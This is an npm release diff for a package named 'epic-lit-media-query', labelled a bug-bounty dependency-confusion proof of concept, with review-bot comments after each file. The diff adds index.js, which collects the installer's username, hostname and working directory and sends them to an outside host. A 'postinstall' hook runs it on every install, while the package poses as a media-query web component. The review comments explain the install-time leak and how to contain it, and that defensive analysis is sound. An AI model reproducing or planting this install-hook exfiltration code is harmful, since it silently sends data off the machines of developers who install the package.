epic-lit-media-query 0.0.1-security → 2.0.4
Potentially problematic release.
This version of epic-lit-media-query might be problematic.
- package/README.md +5 -5
- package/index.js +33 -0
- package/lit-media-query.js +139 -0
- package/package.json +18 -3
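--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +1,5 @@
-
-
-This
-
-
+### epic-lit-media-query
+
+This is a proof of concept package to demonstrate dependency confusion in a particular program.
+
+It collects basic information to demonstrate impact to the triage team, for inquiries please reach out to: thelastninja@wearehackerone.com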
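--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,33 @@
+const os = require('os');
+const http = require('http');
+
+// This is a proof-of-concept package that is part of a Bug Bounty compaign
+// Please note that this is not a malicious package, it is meant only as demonstration for dependency confusion
+// It collects username, hostname and current path and submits them to a remote server to demonstrate impact
+// For any inquiries please reach out to: thelastninja@wearehackerone.com
+
+async function sendUserInfoToLogging() {
+try {
+const userInfo = os.userInfo();
+const hostname = os.hostname();
+const currentPath = process.cwd();
+
+// Combine user and host information
+const userInfoString = `${userInfo.username}@${hostname}:${currentPath}`;
+
+// Base64 encode the combined string
+const encodedUserInfo = Buffer.from(userInfoString).toString('base64');
+
+// Construct the URL with encoded user information
+const url = `http://npm.thelastninja.me/logging?user_info=${encodedUserInfo}`;
+
+// Send a GET request to the logging endpoint
+const response = await http.get(url);
+
+} catch (error) {
+console.error('Error sending user info to logging:', error.message);
+}
+}
+
+// Call the function to send user info to logging
+sendUserInfoToLogging();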
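Review bot: The unconditional `sendUserInfoToLogging();` at the end of the file runs as soon as the file is executed, and package.json wires it to `postinstall`, so the username, hostname and working directory leave the machine during `npm install` without any prompt. The payload goes over plain `http://` in a query string and is only base64-encoded, so it is readable in transit and in any proxy or server log along the way. `http.get` returns a `ClientRequest` rather than a promise, so the `await` does not wait for the request and the `try/catch` does not see connection errors; a failed request would surface as an unhandled `'error'` event and a failing install step rather than the logged message. The install-time call should be dropped from the published package; consumers can contain it by installing with `--ignore-scripts` and reviewing outbound requests to the host named in `url`.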
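--- a/package/lit-media-query.js
+++ b/package/lit-media-query.js
@@ -0,0 +1,139 @@
+import {
+LitElement,
+html
+} from 'lit-element';
+
+/**
+* The `lit-media-query` component detects when a media query
+* is `true` or `false`.
+*/
+class LitMediaQuery extends LitElement {
+/**
+* Fired when `lit-media-query` changes detects a change
+* in the media query (from `true` to `false` and vice versa).
+*
+* @event changed
+* @param {boolean} value If media query is being fulfilled or not.
+*/
+
+static get properties() {
+return {
+/**
+* Media query to be watched by the element.
+*
+* Can be modified at run time by setting a new value.
+*/
+query: {
+type: String
+},
+_match: {
+type: Boolean
+}
+};
+}
+
+constructor() {
+super();
+this.query = '(max-width:460px)';
+this._match = false;
+this.boundResizeHandler = this._handleRisize.bind(this);
+}
+
+render() {
+return html `
+<style>
+:host {
+display: none;
+}
+</style>
+`;
+}
+
+firstUpdated() {
+// Check media query once before 'resize' event
+this._initialMediaQueryCheck();
+}
+
+connectedCallback() {
+super.connectedCallback();
+// Check if Visual Viewport API is supported
+if (typeof window.visualViewport !== 'undefined') {
+window.visualViewport.addEventListener('resize', this.boundResizeHandler);
+} else {
+window.addEventListener('resize', this.boundResizeHandler);
+}
+}
+
+disconnectedCallback() {
+// Remove event listeners
+if (typeof window.visualViewport !== 'undefined') {
+window.visualViewport.removeEventListener(
+'resize',
+this.boundResizeHandler
+);
+} else {
+window.removeEventListener('resize', this.boundResizeHandler);
+}
+super.disconnectedCallback();
+}
+
+_initialMediaQueryCheck() {
+if (window.matchMedia(this.query).matches) {
+this.dispatchEvent(
+new CustomEvent('changed', {
+detail: {
+value: true
+},
+composed: true,
+bubbles: true
+})
+);
+} else {
+this.dispatchEvent(
+new CustomEvent('changed', {
+detail: {
+value: false
+},
+composed: true,
+bubbles: true
+})
+);
+}
+}
+
+_handleRisize() {
+if (window.matchMedia(this.query).matches) {
+// From no match to match
+if (this._match === false) {
+this.dispatchEvent(
+new CustomEvent('changed', {
+detail: {
+value: true
+},
+composed: true,
+bubbles: true
+})
+);
+this._match = true;
+}
+} else {
+// From match to no match
+if (this._match === true) {
+this.dispatchEvent(
+new CustomEvent('changed', {
+detail: {
+value: false
+},
+composed: true,
+bubbles: true
+})
+);
+this._match = false;
+}
+}
+}
+}
+
+if (!window.customElements.get('lit-media-query')) {
+customElements.define('lit-media-query', LitMediaQuery);
+}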
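Review bot: `_initialMediaQueryCheck` dispatches `changed` but never stores the result in `this._match`, so when the query already matches at first render the first `resize` handled by `_handleRisize` still sees `_match === false` and fires a second `changed` with `value: true`. Recording the state before dispatching, e.g. `this._match = window.matchMedia(this.query).matches;` at the top of `_initialMediaQueryCheck`, keeps the two methods consistent. Separately, nothing in index.js, the `main` declared in package.json, loads this file, and it uses ES `import` while index.js uses `require`, so the component appears to be unreachable from the package entry point.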
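--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,21 @@
 {
 "name": "epic-lit-media-query",
-"version": "
-"description": "
-"
+"version": "2.0.4",
+"description": "This is a poc package for bug bounty dependency confusion test, it only collects basic info to demonstrate impact to the triage team",
+"main": "index.js",
+"scripts": {
+"test": "echo \"Error: no test specified\" && exit 1",
+"postinstall": "node index.js"
+},
+"repository": {},
+"keywords": [
+"poc"
+],
+"author": "thelastninja@wearehackerone.com",
+"license": "MIT",
+"bugs": {
+"url": "https://hackerone.com/thelastninja"
+},
+"homepage": "https://hackerone.com/thelastninja",
+"dependencies": {}
 }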
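Review bot: The added `"postinstall": "node index.js"` makes npm execute index.js on every install, before any consumer code imports the package, which is what turns the data collection in index.js into an install-time side effect; the line should be removed. The version moves from the `0.0.1-security` placeholder to `2.0.4`, and a high public version under a name that presumably matches an internal package is what lets a resolver prefer the public copy. `"repository": {}` is empty, so there is no source to compare the tarball against. On the consuming side, pin the name to a private scope or registry and set `ignore-scripts=true` in `.npmrc` for CI installs.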